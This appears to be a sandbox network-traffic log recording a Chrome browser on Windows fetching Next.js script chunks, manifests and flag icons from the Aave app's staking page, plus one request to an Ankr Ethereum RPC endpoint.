Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7416.0f6b78b314050ddc.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9447-905d9c1c85542ff2.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6538.c29c8d91ac649877.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/652.53344261806e4edf.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7211.97ed2d8f31bff064.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6504.7680acad69b7b910.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/797.3519e0e5bb08cfaa.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6745.f8196274743a395d.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5780.fe39358b1d632e65.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9410.9b52440c93125af8.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/2431.f5a5acbb8bd2a9de.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1367.e6cb3b6253483840.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/29107295.4a69275373f23f88.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4822.4432b8c54d409362.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6211.0162dd216a599ca3.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8806.676baa0645cae697.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1811.176323f7838502d3.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/2992.c7b7d0c292a03716.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7566.99a87831b4543cdd.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3695.9b23cacc12b097a3.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9287.367ffb9426ce0802.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4423.ed6f3ef6bf1f44f5.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/523.a7e983d8dea8db71.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3253.7a4e57b5a8b3929a.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-e3633ebc14262ebc.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9447-905d9c1c85542ff2.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6538.c29c8d91ac649877.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/framework-79bce4a3a540b080.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7211.97ed2d8f31bff064.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-37e08f82b0681cde.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/652.53344261806e4edf.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6504.7680acad69b7b910.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_app-59c4c0609aba862f.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7715-d9ff1ad95acbdf2d.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/29107295.4a69275373f23f88.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/82-c4138125c2feb6d3.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /eth HTTP/1.1Host: rpc.ankr.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6083-20b4cdfe836910e6.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/2992.c7b7d0c292a03716.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7566.99a87831b4543cdd.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-e3633ebc14262ebc.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3253.7a4e57b5a8b3929a.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/staking-81c5f92db5f61cfe.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/ZcUTDKp_rDmFKouqSkKwt/_buildManifest.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/ZcUTDKp_rDmFKouqSkKwt/_ssgManifest.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/ZcUTDKp_rDmFKouqSkKwt/_middlewareManifest.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8806.676baa0645cae697.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4822.4432b8c54d409362.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/framework-79bce4a3a540b080.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /icons/flags/en.svg HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /icons/flags/es.svg HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /icons/flags/fr.svg HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
